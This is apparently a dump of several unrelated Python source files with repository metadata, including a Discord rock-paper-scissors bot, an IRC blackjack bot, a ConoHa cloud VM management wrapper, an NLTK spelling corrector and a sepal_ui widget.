π = np.zeros(len(S))
V = np.max(R, 1)
# Value Improvement
while True:
V_dash = V.copy()
for s in S:
V[s] = np.max(R[s] + γ*(P @ V)[s])
if np.max(np.abs(V - V_dash)) < ε:
break
# Policy Evaluation
for s in S:
π[s] = np.argmax(R[s] + γ*(P @ V)[s])
return (V, π)
|
[
"[email protected]"
] | |
ed13a2f82e64a2a0f974e4a2f874097a01dc0b63
|
c75061046131f369f05b86fc9c73c6bc5274435c
|
/main.py
|
8d7b83aece0845b1924d206b14a8093a1da8b007
|
[] |
no_license
|
YK2006/Elite-Qualifier
|
8b294cae417def9e9e7c6d5be54ca09b0b572012
|
a333515e97edbf36fc3813d8ffe61595fa28b379
|
refs/heads/master
| 2023-08-02T07:21:26.695343 | 2021-09-21T21:57:32 | 2021-09-21T21:57:32 | 329,127,428 | 0 | 0 | null | 2021-09-21T21:57:33 | 2021-01-12T22:21:13 |
Python
|
UTF-8
|
Python
| false | false | 792 |
py
|
import nltk
from nltk.corpus import words
from nltk.metrics.distance import (
edit_distance,
jaccard_distance,
)
from nltk.util import ngrams
nltk.download('words')
import pandas
correct_spellings = words.words()
spellings_series = pandas.Series(correct_spellings)
spellings_series
def editreco(entries=['cormulent', 'incendenece', 'validrate']):
outcomes = []
for entry in entries:
distances = ((edit_distance(entry,
word), word)
for word in correct_spellings)
closest = min(distances)
outcomes.append(closest[1])
return outcomes
editreco()
userinput = []
for i in range(0,3):
word = input("threa woeds pleese: ")
userinput.append(word)
userinput
editreco(userinput)
|
[
"[email protected]"
] | |
f9d8e67a72e3fb01d707f24b28952f2af2b0fcb1
|
84a0e064213834247f8e66da868c6c132038dd47
|
/main.py
|
a1bbd119205233134637d1373f93c5655663c4ff
|
[] |
no_license
|
AlexJS6/Python_bot
|
ee2ae97afc3af8b24b3831d1bd7485f16a0c007b
|
c253a5fac2971e545455d0f07a8e45777d70d4d2
|
refs/heads/main
| 2023-02-09T20:43:02.932155 | 2020-12-30T16:39:50 | 2020-12-30T16:39:50 | 323,345,013 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,216 |
py
|
import discord
import os
import random
import time
client = discord.Client() # Connection to discord
possibilities = ['stone', 'paper', 'scissors']
@client.event
async def on_ready():
print('We have logged in as {0.user}'.format(client))
@client.event
async def on_message(message):
if message.author == client.user:
return
msg = message.content
if msg.startswith('$PapSciSto'):
await message.channel.send('Those are the instructions: \n- Send \'$play\' to play \n- After the countdown send: \'paper\', \'stone\' or \'scissors\' in the 5 seconds \n- And then you will lose because I\'m insane at this game! \nGood Luck!!')
if msg.startswith('$play'):
channel = message.channel
non_split_author = message.author
author = str(message.author).split('#')[0]
for i in range(3, -1, -1):
time.sleep(1)
if i == 0:
await channel.send('GOGOGO MY MAN!')
else:
await channel.send(i)
def check(m):
"""
Checks if the wait_for is correct
"""
return m.content in possibilities and m.author == non_split_author and m.channel == channel
response = await client.wait_for('message', timeout=5, check=check)
bot_response = random.choice(possibilities)
await channel.send(bot_response.upper())
time.sleep(1)
if bot_response == 'scissors' and response.content == 'paper':
await channel.send('bot: {0} \n{1}: {2} \nI WON'.format(bot_response, author, response.content))
if bot_response == 'scissors' and response.content == 'stone':
await channel.send('bot: {0} \n{1}: {2} \nYOU WON'.format(bot_response, author, response.content))
if bot_response == 'stone' and response.content == 'paper':
await channel.send('bot: {0} \n{1}: {2} \nYOU WON'.format(bot_response, author, response.content))
if bot_response == 'stone' and response.content == 'scissors':
await channel.send('bot: {0} \n{1}: {2} \nI WON'.format(bot_response, author, response.content))
if bot_response == 'paper' and response.content == 'scissors':
await channel.send('bot: {0} \n{1}: {2} \nYOU WON'.format(bot_response, author, response.content))
if bot_response == 'paper' and response.content == 'stone':
await channel.send('bot: {0} \n{1}: {2} \nI WON'.format(bot_response, author, response.content))
if bot_response == response.content:
await channel.send('bot: {0} \n{1}: {2} \nDRAWWW MY MAN!'.format(bot_response, author, response.content))
'''else:
await channel.send('bot: {0} \n{1}: {2} \nDAAMN THERE IS A PROBLEM'.format(bot_response, author, response.content))'''
'''beginning_time = time.time()
for i in range(5, -1, -1):
time.sleep(1)
if i == 0:
await message.channel.send('@{0.author} Go'.format(message))
else:
await message.channel.send(i)'''
#await message.channel.send('')
#await message.channel.send(response)
client.run(os.getenv('TOKEN'))
|
[
"[email protected]"
] | |
c4be81c83c88067b9cf207fdeb2ab275f44e2c08
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/F4iemEeFfsaFoMpAF_4.py
|
786cba909da3a937ac21071a5cc1d90693d4e336
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 776 |
py
|
"""
This is a list of single characters with an unwanted character at the end:
["H", "e", "l", "l", "o", "!", "\0"]
You could also just type "Hello!" when initializing a variable, creating the
string "Hello!"
Create a function that will return a string by combining the given character
list, not including the unwanted final character.
### Examples
cpp_txt(["H", "i", "!", "\0"]) ➞ "Hi!"
cpp_txt(["H", "e", "l", "l", "o", "!", "\0"]) ➞ "Hello!"
cpp_txt(["J", "A", "V", "a", "\0"]) ➞ "JAVa"
### Notes
This is a translation of a C++ challenge and is trivial in Python, but perhaps
it will be helpful to someone out there. (No challenge is trivial until you
know how to solve it :)
"""
def cpp_txt(lst):
return ''.join(lst[:-1])
|
[
"[email protected]"
] | |
13d3c21576b08012b57d0ca3bc3f2ba7deda7096
|
e84e67f95ca406cc3bb95253f8d7903185848cef
|
/templates/raw_methods.py
|
07947722b7c1806cffda9c17ee3bebbac471b107
|
[
"MIT"
] |
permissive
|
OSUKED/ElexonDataPortal
|
5aca48285a49f6b3ae81fd130d5c5e14672dba15
|
d8be59c56dda41bd8f2a9efbb3620b4b563710da
|
refs/heads/master
| 2023-04-08T05:06:42.193628 | 2023-04-01T18:55:39 | 2023-04-01T18:55:39 | 189,842,391 | 46 | 13 |
MIT
| 2023-09-02T23:03:23 | 2019-06-02T12:14:48 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 508 |
py
|
import requests
{% for function in functions %}
def {{ function['name'] }}({% for parameter in function['parameters'] %}
{{ parameter['name'] }}='{{ parameter['example'] }}',{% endfor %}
endpoint='{{ function['endpoint'] }}'
):
"""{{ function['description'] }}
"""
params = { {% for parameter in function['parameters'] %}
'{{ parameter['name'] }}': {{ parameter['name'] }},{% endfor %}
}
r = requests.get(endpoint, params=params)
return r
{% endfor %}
|
[
"[email protected]"
] | |
53b2af0868849bff57dbd8b705257e3f2690e172
|
a88d9c0176f5e4c0d0bd9664270e000ebb5edbd9
|
/component/tile/sensor_tile.py
|
9b549723c7bbb0854467b7bcc1072e972e246aa2
|
[
"MIT"
] |
permissive
|
sandroklippel/fcdm
|
fb81c73fc6bd1cf296f9301272923c3627474d3f
|
5a54e6352bb574ba409be38882ff0d13b3473b7a
|
refs/heads/master
| 2023-08-19T22:05:52.055545 | 2021-08-24T11:23:40 | 2021-08-24T11:23:40 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,828 |
py
|
from datetime import datetime as dt
from sepal_ui import sepalwidgets as sw
import ipyvuetify as v
from component import parameter as cp
from component.message import cm
class SensorTile(sw.Tile):
def __init__(self, model):
# create adjustable variables end and start
self.end = dt.now().year
self.start = 1950 # prior to any sats
# create the widgets
self.sensors_select = v.Select(label=cm.input_lbl.sensor, items=[], v_model=[], multiple=True, chips=True, deletable_chips=True)
landsat_7_switch = v.Switch(label=cm.input_lbl.do_threshold, v_model =model.improve_L7)
landsat_7_slider = v.Slider(class_='mt-5', label=cm.input_lbl.threshold, min=0, max=.3, step=.001, v_model=model.improve_threshold, thumb_label='always')
cloud_buffer = v.Slider(class_='mt-5', label=cm.input_lbl.cloud_buffer, min=0, max =2500, step=10, v_model=model.cloud_buffer, thumb_label='always')
# bind them to io
model \
.bind(self.sensors_select, 'sensors',) \
.bind(landsat_7_switch, 'improve_L7',) \
.bind(landsat_7_slider, 'improve_threshold',) \
.bind(cloud_buffer, 'cloud_buffer',)
super().__init__(
'nested_widget',
cm.tile.sensor,
inputs = [self.sensors_select, landsat_7_switch, landsat_7_slider, cloud_buffer],
alert = sw.Alert()
)
# add js behaviour
self.sensors_select.observe(self._check_sensor, 'v_model')
model.observe(self._change_start, 'reference_start')
model.observe(self._change_end, 'analysis_end')
def _check_sensor(self, change):
"""
prevent users from selecting landsat and sentinel 2 sensors
provide a warning message to help understanding
"""
# exit if its a removal
if len(change['new']) < len(change['old']):
self.alert.reset()
return self
# use positionning in the list as boolean value
sensors = ['landsat', 'sentinel']
# guess the new input
new_value = list(set(change['new']) - set(change['old']))[0]
id_ = next(i for i, s in enumerate(sensors) if s in new_value)
if sensors[id_] in new_value:
if any(sensors[not id_] in s for s in change['old']):
change['owner'].v_model = [new_value]
self.alert.add_live_msg(cm.no_mix, 'warning')
else:
self.alert.reset()
return self
def _change_end(self, change):
self.end = int(change['new'][:4]) if change['new'] else dt.now().year
self._check_sensor_availability()
return self
def _change_start(self, change):
self.start = int(change['new'][:4]) if change['new'] else 1950
self._check_sensor_availability()
return self
def _check_sensor_availability(self):
"""reduce the number of available satellites based on the dates selected by the user"""
# reset current values
self.sensors_select.items = []
self.sensors_select.v_model = []
# check every satellite availability
years = range(self.start, self.end + 1)
sensors = []
for s in cp.sensors:
if any(e in years for e in [cp.sensors[s]['start'], cp.sensors[s]['end']]):
sensors.append(s)
elif cp.sensors[s]['start'] < self.start and cp.sensors[s]['end'] > self.end:
sensors.append(s)
self.sensors_select.items = sensors
return self
|
[
"[email protected]"
] | |
f649e05cb3c2513dbd63376cb0fe10827d696e1d
|
f137ceab2fd55f79777974a624119001457e0cb9
|
/blackjack/core/irc.py
|
a88346a8ed59c8835fb9a0c5c469c804f88decaf
|
[
"ISC"
] |
permissive
|
dingopride/blackjack
|
bbd97a0b34d57dd40056540d5ad2fac674b9b586
|
64bbe82172ee24662b9830bf5fc4111a41362272
|
refs/heads/master
| 2021-09-16T00:23:15.082583 | 2018-06-13T17:09:28 | 2018-06-13T17:09:28 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 13,529 |
py
|
#!/usr/bin/env python
# BlackJack IRC Bot
# Developed by acidvegas in Python
# https://git.acid.vegas/blackjack
# blackjack.py
import inspect
import os
import random
import socket
import ssl
import threading
import time
import config
import debug
# Data Directories & Files (DO NOT EDIT)
data_dir = os.path.join(os.path.dirname(os.path.realpath(inspect.stack()[-1][1])), 'data')
cheat_file = os.path.join(data_dir, 'cheat.txt')
help_file = os.path.join(data_dir, 'help.txt')
# Card Types
club = ('♣','clubs')
diamond = ('♦','diamonds')
heart = ('♥','hearts')
spade = ('♠','spades')
# Deck Table (Name, ASCII, Value, Remaining Suits)
deck = {
'ace' : [None, 11, [club,diamond,heart,spade]],
'two' : [None, 2, [club,diamond,heart,spade]],
'three' : [None, 3, [club,diamond,heart,spade]],
'four' : [None, 4, [club,diamond,heart,spade]],
'five' : [None, 5, [club,diamond,heart,spade]],
'six' : [None, 6, [club,diamond,heart,spade]],
'seven' : [None, 7, [club,diamond,heart,spade]],
'eight' : [None, 8, [club,diamond,heart,spade]],
'nine' : [None, 9, [club,diamond,heart,spade]],
'ten' : [None, 10, [club,diamond,heart,spade]],
'jack' : [None, 10, [club,diamond,heart,spade]],
'queen' : [None, 10, [club,diamond,heart,spade]],
'king' : [None, 10, [club,diamond,heart,spade]]
}
# Formatting Control Characters / Color Codes
bold = '\x02'
italic = '\x1D'
underline = '\x1F'
reverse = '\x16'
reset = '\x0f'
white = '00'
black = '01'
blue = '02'
green = '03'
red = '04'
brown = '05'
purple = '06'
orange = '07'
yellow = '08'
light_green = '09'
cyan = '10'
light_cyan = '11'
light_blue = '12'
pink = '13'
grey = '14'
light_grey = '15'
def color(msg, foreground, background=None):
if background:
return '\x03{0},{1}{2}{3}'.format(foreground, background, msg, reset)
else:
return '\x03{0}{1}{2}'.format(foreground, msg, reset)
class IRC(object):
def __init__(self):
self.ace_minus = False
self.hand = None
self.last_move = 0
self.last_time = 0
self.player = None
self.total = 0
self.mini_deck = False
self.sock = None
def action(self, chan, msg):
self.sendmsg(chan, '\x01ACTION {0}\x01'.format(msg))
def connect(self):
try:
self.create_socket()
self.sock.connect((config.connection.server, config.connection.port))
if config.login.network:
self.raw('PASS ' + config.login.network)
self.raw('USER {0} 0 * :{1}'.format(config.ident.username, config.ident.realname))
self.raw('NICK ' + config.ident.nickname)
except socket.error as ex:
debug.error('Failed to connect to IRC server.', ex)
self.event_disconnect()
else:
self.listen()
def create_socket(self):
family = socket.AF_INET6 if config.connection.ipv6 else socket.AF_INET
self.sock = socket.socket(family, socket.SOCK_STREAM)
if config.connection.vhost:
self.sock.bind((config.connection.vhost, 0))
if config.connection.ssl:
self.sock = ssl.wrap_socket(self.sock)
def draw(self):
card_type = random.choice(list(deck.keys()))
remaining = deck[card_type][2]
while not remaining:
card_type = random.choice(list(deck.keys()))
remaining = deck[card_type][2]
card_suit = random.choice(remaining)
if card_suit in (heart,diamond):
card_color = red
else:
card_color = black
card_value = deck[card_type][1]
if self.mini_deck:
card = deck[card_type][0].replace('X', card_suit[0])
card = color(card, card_color, white)
self.hand.append(card)
else:
for i in range(5):
card = deck[card_type][0][i].replace('X', card_suit[0])
card = color(card, card_color, white)
self.hand[i].append(card)
deck[card_type][2].remove(card_suit)
self.total += card_value
if card_type == 'ace' and deck['ace'][1] != 1:
deck['ace'][1] = 1
return (card_type, card_suit)
def error(self, chan, msg, reason=None):
if reason:
self.sendmsg(chan, '[{0}] {1} {2}'.format(color('ERROR', red), msg, color('({0})'.format(str(reason)), grey)))
else:
self.sendmsg(chan, '[{0}] {1}'.format(color('ERROR', red), msg))
def event_connect(self):
self.setup_deck('normal')
if config.login.nickserv:
self.identify(self.username, config.login.nickserv)
if config.login.operator:
self.oper(config.ident.username, config.login.operator)
self.join(config.connection.channel, config.connection.key)
def event_disconnect(self):
self.sock.close()
self.reset()
time.sleep(10)
self.connect()
def event_kick(self, nick, chan, kicked):
if kicked == config.ident.nickname and chan == config.connection.channel:
time.sleep(3)
self.join(config.connection.channel, config.connection.key)
def event_message(self, nick, chan, msg):
if chan == config.connection.channel:
if not msg.startswith('.'):
if msg == '@help':
self.action(chan, 'Sending help in a private message...')
help = [line.strip() for line in open(help_file).readlines() if line]
for line in help:
self.sendmsg(chan, line)
elif msg == '@cheat':
self.action(chan, 'Sending cheat sheet in a private message...')
cheat_sheet = [line.strip() for line in open(cheat_file).readlines() if line]
for line in cheat_sheet:
self.sendmsg(chan, line)
else:
cmd = msg.split()[0][1:]
args = msg[len(cmd)+2:]
if time.time() - self.last_time < 2:
self.sendmsg(chan, color('Slow down nerd!', red))
elif cmd == 'hit':
if self.player:
if self.player == nick:
card_type, card_suit = self.draw()
if self.mini_deck:
msg_str = ''
for i in self.hand:
msg_str += ' ' + i
self.sendmsg(chan, msg_str)
else:
for i in range(5):
msg_str = ''
for i in self.hand[i]:
msg_str += ' ' + i
self.sendmsg(chan, msg_str)
if self.total > 21:
if deck['ace'][1] == 1 and not self.ace_minus:
self.total = self.total - 10
self.ace_minus = True
if self.total > 21:
self.sendmsg(chan, '{0} {1}'.format(color('BUST!', red), color('You went over 21 and lost!', grey)))
self.reset()
else:
self.sendmsg(chan, '{0} {1}'.format(color('You drew a {0} of {1}! Your total is now:'.format(card_type, card_suit[1]), yellow), color(str(self.total), light_blue)))
self.last_move = time.time()
else:
self.sendmsg(chan, '{0} {1}'.format(color('BUST!', red), color('You went over 21 and lost!', grey)))
self.reset()
else:
self.sendmsg(chan, '{0} {1}'.format(color('You drew a {0} of {1}! Your total is now:'.format(card_type, card_suit[1]), yellow), color(str(self.total), light_blue)))
self.last_move = time.time()
else:
self.error(chan, 'You are not currently playing!', '{0} is playing still'.format(self.player))
else:
self.error(chan, 'You are not currently playing!')
elif cmd == 'mini':
if not self.player:
if self.mini_deck:
self.setup_deck('normal')
self.sendmsg(chan, '{0} {1}'.format(color('Mini deck has been', yellow), color('DISABLED', red)))
else:
self.setup_deck('mini')
self.sendmsg(chan, '{0} {1}'.format(color('Mini deck has been', yellow), color('ENABLED', green)))
else:
self.error(chan, 'You can not change the deck in game!')
elif cmd == 'play':
if not self.player:
self.player = nick
self.action(chan, 'Starting a game of blackjack with {0}!'.format(nick))
for i in range(2):
self.draw()
if self.mini_deck:
msg_str = ''
for i in self.hand:
msg_str += ' ' + i
self.sendmsg(chan, msg_str)
else:
for i in range(5):
msg_str = ''
for i in self.hand[i]:
msg_str += ' ' + i
self.sendmsg(chan, msg_str)
self.sendmsg(chan, '{0} {1}'.format(color('Your total is now:', yellow), color(str(self.total), light_blue)))
self.last_move = time.time()
threading.Thread(target=self.timer).start()
elif self.player == nick:
self.error(chan, 'You have already started a game, please finish or stop the game!'.format(self.player))
else:
self.error(chan, '{0} is currently playing a game, please wait!'.format(self.player))
elif cmd == 'stand':
if self.player:
if self.player == nick:
self.sendmsg(chan, 'You have chosen to stand with {0} as your total.'.format(self.total))
else:
self.error(chan, 'You are not currently playing!', '{0} is playing still'.format(self.player))
else:
self.error(chan, 'You are not currently playing!')
elif cmd == 'stop':
if self.player:
if self.player == nick:
self.action(chan, 'Ending current game with {0}!'.format(nick))
self.reset()
else:
self.error(chan, 'You are not currently playing!', '{0} is playing still'.format(self.player))
else:
self.error(chan, 'You are not currently playing!')
self.last_time = time.time()
def event_nick_in_use(self):
debug.error_exit('BlackJack is already running.')
def event_part(self, nick, chan):
if self.player == nick:
self.sendmsg(chan, 'The game with {0} has ended.'.format(color(self.nick, light_blue)))
self.reset()
def event_quit(self, nick):
if self.player == nick:
self.sendmsg(chan, 'The game with {0} has ended.'.format(color(self.nick, light_blue)))
self.reset()
def handle_events(self, data):
args = data.split()
if args[0] == 'PING':
self.raw('PONG ' + args[1][1:])
elif args[1] == '001': # Use 002 or 003 if you run into issues.
self.event_connect()
elif args[1] == '433':
self.event_nick_in_use()
elif args[1] in ('KICK','PART','PRIVMSG','QUIT'):
nick = args[0].split('!')[0][1:]
if nick != config.ident.nickname:
if args[1] == 'KICK':
chan = args[2]
kicked = args[3]
self.event_kick(nick, chan, kicked)
elif args[1] == 'PART':
chan = args[2]
self.event_part(nick, chan)
elif args[1] == 'PRIVMSG':
chan = args[2]
msg = data.split('{0} PRIVMSG {1} :'.format(args[0], chan))[1]
if chan != config.ident.nickname:
self.event_message(nick, chan, msg)
elif args[1] == 'QUIT':
self.event_quit(nick)
def identify(self, username, password):
self.sendmsg('nickserv', f'identify {username} {password}')
def join(self, chan, key=None):
self.raw(f'JOIN {chan} {key}') if key else self.raw('JOIN ' + chan)
def listen(self):
while True:
try:
data = self.sock.recv(1024).decode('utf-8')
if data:
for line in (line for line in data.split('\r\n') if line):
debug.irc(line)
if line.startswith('ERROR :Closing Link:') and config.ident.nickname in data:
raise Exception('Connection has closed.')
elif len(line.split()) >= 2:
self.handle_events(line)
else:
debug.error('No data recieved from server.')
break
except (UnicodeDecodeError,UnicodeEncodeError):
debug.error('Unicode error has occured.')
except Exception as ex:
debug.error('Unexpected error occured.', ex)
break
self.event_disconnect()
def mode(self, target, mode):
self.raw(f'MODE {target} {mode}')
def raw(self, msg):
self.sock.send(bytes(msg + '\r\n', 'utf-8'))
def reset(self):
self.ace = [False,False]
self.last_move = 0
self.player = None
self.total = 0
if self.mini_deck:
self.hand = []
else:
self.hand = {0:[],1:[],2:[],3:[],4:[]}
deck['ace'][1] = 11
for card in deck:
deck[card][2] = [club,diamond,heart,spade]
def sendmsg(self, target, msg):
self.raw(f'PRIVMSG {target} :{msg}')
def setup_deck(self, deck_type):
if deck_type == 'mini':
self.hand = []
self.mini_deck = True
deck['ace'][0] = 'A X'
deck['two'][0] = '2 X'
deck['three'][0] = '3 X'
deck['four'][0] = '4 X'
deck['five'][0] = '5 X'
deck['six'][0] = '6 X'
deck['seven'][0] = '7 X'
deck['eight'][0] = '8 X'
deck['nine'][0] = '9 X'
deck['ten'][0] = '10X'
deck['jack'][0] = 'J X'
deck['queen'][0] = 'Q X'
deck['king'][0] = 'K X'
elif deck_type == 'normal':
self.hand = {0:[],1:[],2:[],3:[],4:[]}
self.mini_deck = False
deck['ace'][0] = ('A ',' ',' X ',' ',' A')
deck['two'][0] = ('2 ',' X ',' ',' X ',' 2')
deck['three'][0] = ('3 ',' X ',' X ',' X ',' 3')
deck['four'][0] = ('4 ',' X X ',' ',' X X ',' 4')
deck['five'][0] = ('5 ',' X X ',' X ',' X X ',' 5')
deck['six'][0] = ('6 ',' X X ',' X X ',' X X ',' 6')
deck['seven'][0] = ('7 ',' X X ',' XXX ',' X X ',' 7')
deck['eight'][0] = ('8 ',' XXX ',' X X ',' XXX ',' 8')
deck['nine'][0] = ('9 ',' XXX ',' XXX ',' XXX ',' 9')
deck['ten'][0] = ('10 ',' XXX ',' XX XX ',' XXX ',' 10')
deck['jack'][0] = ('J ',' ',' X ',' ',' J')
deck['queen'][0] = ('Q ',' ',' X ',' ',' Q')
deck['king'][0] = ('K ',' ',' X ',' ',' K')
def timer(self):
while self.player:
if time.time() - self.last_move > self.game_timeout:
self.sendmsg(config.connection.channel, '{0}, you took too long! The game has ended.'.format(self.player))
self.reset()
break
else:
time.sleep(1)
BlackJack = IRC()
|
[
"[email protected]"
] | |
f18fd140c8e9bfd602bdbefe8fa44a0b679217f3
|
e16f312c9a7c1fc8d977d8d5c33cd95cf7178c15
|
/www/conoha/src/lib/cmd.py
|
ac0d56e47d1465f505e42b8cb21f8559a94b6507
|
[
"Unlicense",
"LicenseRef-scancode-public-domain"
] |
permissive
|
user340/tools
|
c871ce7c916c89f2b03502d28baee6b0e98a1401
|
e743708013a4068d20904eeb89aa664957ede980
|
refs/heads/master
| 2023-02-03T08:45:21.040773 | 2023-01-28T05:43:22 | 2023-01-28T05:43:22 | 124,639,827 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 10,223 |
py
|
#!/usr/bin/env python
import texttable
import time
import re
from lib import api
from lib import exceptions
class ConoHaCmd:
def __init__(self, confname='conf/conohactl.conf'):
self.__api = api.ConoHaAPI(confname=confname)
def check_id_or_tag(self, string):
""" If given string is UUID, return it. If not UUID, It may Tag
Args:
string (str): UUID or Tag
Returns:
str: UUID
"""
if re.match(r'\w{8}-\w{4}-\w{4}-\w{4}-\w{12}', string):
return string
else:
return self.get_server_id_from_tag(string)
def return_table(self, colums=None):
if type(colums) is not int:
raise TypeError
elif colums < 1:
raise ValueError('Given argument less than 1')
table = texttable.Texttable()
table.set_cols_align(['l' for _ in range(colums)])
table.set_cols_valign(['m' for _ in range(colums)])
table.set_deco(texttable.Texttable.HEADER)
return table
def return_vm_status_table(self, before, after):
"""Return table that shows changes virtual machine status
Args:
before (dict): machine status before operation
after (dict): machine status after operation
Returns:
texttable.Texttable
"""
table = self.return_table(4)
table.header(['Tag', 'Previous', '->', 'Now'])
table.add_row([
after['server']['metadata']['instance_name_tag'],
before['server']['status'],
'->',
after['server']['status']
])
return table
def get_vm_list(self):
"""Get all virtual machine list
Returns:
texttable.Texttable: It contains server ID and name
"""
body, _ = self.__api.get_vms_list()
table = self.return_table(2)
table.header(['Name', 'UUID'])
for server in body['servers']:
table.add_row([server['name'], server['id']])
return table
def get_vm_detail(self, server_id):
"""Return VM informations.
This is `lib.api.get_vm_detail_specified` wrapper method
Args:
server_id (str): UUID of virtual machine
Returns:
dict: API response body
"""
body, _ = self.__api.get_vm_detail_specified(server_id)
return body
def get_server_id_from_tag(self, tag):
""" Return VM UUID by given Tag
Args:
tag (str): VM Tag
Returns:
str: UUID if found. Otherwise empty.
"""
if type(tag) is not str:
raise TypeError
body, _ = self.__api.get_all_vm_details()
for vm in body['servers']:
if vm['metadata']['instance_name_tag'] == tag:
return vm['id']
raise ValueError
def show_vm_detail(self, server_id, ipv4=True, ipv6=False):
"""Show specified VM informations
Args:
server_id (str): UUID of virtual machine
ipv4 (bool): Flag that show IPv4 address or not
ipv6 (bool): Flag that show IPv6 address or not
Returns:
texttable.Texttable: Server name, Tag and UUID
texttable.Texttable: IPv4/IPv6 address, server status and plan
"""
if type(server_id) is not str:
raise TypeError
try:
res = self.get_vm_detail(self.check_id_or_tag(server_id))
except exceptions.ServerNotFoundError:
raise
except exceptions.NothingServerIDError:
raise
except Exception:
raise
address = {'ipv4': None, 'ipv6': None}
for interface in res['server']['addresses']:
for nwinfo in res['server']['addresses'][interface]:
if nwinfo['version'] == 4 and ipv4:
address['ipv4'] = nwinfo['addr']
elif nwinfo['version'] == 6 and ipv6:
address['ipv6'] = nwinfo['addr']
first_table = self.return_table(3)
second_table = self.return_table(4)
first_table.header(['Name', 'Tag', 'UUID'])
first_table.add_row(
[
res['server']['name'],
res['server']['metadata']['instance_name_tag'],
res['server']['id']
]
)
second_table.header(['IPv4', 'IPv6', 'Status', 'Plan'])
second_table.add_row(
[
address['ipv4'],
address['ipv6'],
res['server']['status'],
self.__api.get_flavor_name(res['server']['flavor']['id'])
]
)
return first_table, second_table
def show_billing(self, limit=1):
"""Show billing invoices
Args:
limit (int): number of billing information
Returns:
texttable.Texttable:
It contains invoice ID, payment method, bill, and due date.
"""
if type(limit) is not int:
raise TypeError
if limit < 0:
raise ValueError
body, _ = self.__api.get_billing_invoices(limit=limit)
table = self.return_table(4)
table.header(['Invoice ID', 'Type', 'Yen (include tax)', 'Due'])
for i in range(len(body['billing_invoices'])):
table.add_row(
[
body['billing_invoices'][i]['invoice_id'],
body['billing_invoices'][i]['payment_method_type'],
body['billing_invoices'][i]['bill_plus_tax'],
body['billing_invoices'][i]['due_date']
]
)
return table
def power_on_vm(self, server_id):
"""Power on to specified virtual machine
Args:
server_id (str): virtual machine UUID
Returns:
texttable.Texttable:
It contains Tag, before status and current status
"""
if type(server_id) is not str:
raise TypeError
uuid = self.check_id_or_tag(server_id)
before_power_on = self.get_vm_detail(uuid)
if before_power_on['server']['status'] == 'SHUTOFF':
self.__api.power_on_vm(uuid)
after_power_on = self.get_vm_detail(uuid)
return self.return_vm_status_table(before_power_on, after_power_on)
def shutoff_vm(self, server_id):
"""Shut off to specified virtual machine
Args:
server_id (str): virtual machine UUID
Returns:
texttable.Texttable:
It contains Tag, before status and current status
"""
if type(server_id) is not str:
raise TypeError
uuid = self.check_id_or_tag(server_id)
before_shutoff = self.get_vm_detail(uuid)
if before_shutoff['server']['status'] == 'ACTIVE':
self.__api.stop_cleanly_vm(uuid)
after_shutoff = self.get_vm_detail(uuid)
return self.return_vm_status_table(before_shutoff, after_shutoff)
def reboot_vm(self, server_id):
"""Reboot specified virtual machine
Args:
server_id (str): virtual machine UUID
Returns:
texttable.Texttable:
It contains Tag, before status and current status
"""
if type(server_id) is not str:
raise TypeError
uuid = self.check_id_or_tag(server_id)
before_reboot = self.get_vm_detail(uuid)
if before_reboot['server']['status'] == 'ACTIVE':
self.__api.reboot_vm(uuid)
after_reboot = self.get_vm_detail(uuid)
return self.return_vm_status_table(before_reboot, after_reboot)
def get_flavor_id_from_name(self, flavor_name):
"""Return flavor ID by given flavor name
Args:
flavor_name (str): flavor name
Return:
str: flavor ID
"""
flavors = [
'g-512mb',
'g-1gb',
'g-2gb',
'g-4gb',
'g-8gb',
'g-16gb',
'g-32gb',
'g-64gb'
]
if type(flavor_name) is not str:
raise TypeError
if flavor_name not in flavors:
raise ValueError
return self.__api.get_flavor_id(flavor_name)
def get_flavor_name_from_id(self, flavor_id):
"""Return flavor name by given flavor ID
Args:
flavor_id (str): flavor ID
Returns:
str: flavor name
"""
if type(flavor_id) is not str:
raise TypeError
return self.__api.get_flavor_name(flavor_id)
def change_flavor(self, server_id, flavor_name):
"""Change given server's flavor to given flavor_name
Args:
server_id (str): virtual machine UUID
flavor_name (str): flavor name
Returns:
texttable.Texttable:
It contains Tag, flavor before operation
and flavor after operation
"""
uuid = self.check_id_or_tag(server_id)
pre = self.get_vm_detail(uuid)
if pre['server']['status'] != 'SHUTOFF':
print('Current VM status is ' + pre['server']['status'])
return None
flavor_id = self.__api.get_flavor_id(flavor_name)
self.__api.change_flavor(uuid, flavor_id)
while True:
vm = self.get_vm_detail(uuid)
if vm['server']['status'] == 'VERIFY_RESIZE':
self.__api.confirm_flavor(uuid)
break
else:
time.sleep(10)
while True:
vm = self.get_vm_detail(uuid)
if vm['server']['status'] == 'SHUTOFF':
break
else:
time.sleep(5)
table = self.return_table(4)
table.header(['Tag', 'Previous', '->', 'Now'])
table.add_row(
[
vm['server']['metadata']['instance_name_tag'],
self.get_flavor_name_from_id(pre['server']['flavor']['id']),
'->',
self.get_flavor_name_from_id(vm['server']['flavor']['id']),
]
)
return table
|
[
"[email protected]"
] | |
83fda4a0cc40d780c4a71958ee5387a34a1c76ea
|
298b3c9e4920f1e897dae501c5e958d5a70c81ff
|
/grpcontest.py
|
60d60f51c294c9b12bdb5b27dd944895f03243c3
|
[] |
no_license
|
rapidhere/rpcontest
|
f0a57df25af75358d07f1670b03ba0865cd452c0
|
717b26b01299aea50d04e0b9d2c28c956aa44d5b
|
refs/heads/master
| 2021-01-01T06:11:12.462919 | 2013-04-12T08:28:20 | 2013-04-12T08:28:20 | 9,389,931 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 42,292 |
py
|
#!/usr/bin/python
import wx,os,sys,copy,thread,shutil
import rpc
import wx.aui,wx.gizmos
app_name = "gui-rpcontest"
version = "1.0.0.1"
def CreateLabelItem(parent,label,item):
bsizer = wx.StaticBoxSizer(
wx.StaticBox(parent,-1,label=label),
wx.VERTICAL
)
